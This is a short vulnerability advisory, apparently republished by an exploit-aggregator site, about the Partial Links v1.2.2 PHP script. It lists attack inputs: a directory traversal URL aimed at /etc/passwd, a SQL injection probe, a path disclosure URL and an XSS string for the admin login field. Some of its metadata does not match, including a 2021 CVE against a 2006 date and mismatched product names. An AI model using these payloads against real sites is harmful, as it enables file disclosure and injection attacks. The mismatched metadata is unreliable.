Advertisement






Partial Links v1.2.2 - XSS , Directory traversal

CVE Category Price Severity
CVE-2021-44147 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2006-06-18
CPE
cpe:cpe:/a:partial_links_project:partial_links:1.2.2
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006060100

Below is a copy:

Partial Links v1.2.2

Homepage:

http://www.particlesoft.net/particlelinks/

Effected files:

index.php

page_footer.php

admin.php

Exploits & Vulnerabilities:

Possible directory traversal?:

http://www.example.com/Other_Sites/X_%2526_Y/../../../../../etc/passwd/

SQL Injection:

http://www.example.com/index.php?topic='

Full path disclosure via page_footer.php:

http://www.example.com/includes/page_footer.php

Fatal error: Call to a member function on a non-object in /home/username/public_html/links/includes/page_footer.php

on line 3

((It should be notedpage_header.php gives full path errors too))

The input form box to login as admin can be spoofed to remove the max char limit allowed and the input data isn't properally sanatized before being generated dynamically too.

For proof of concept try entering the following in the username box:

>'';!--"<XSS><img src=lol.jpg>=&{()}<

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum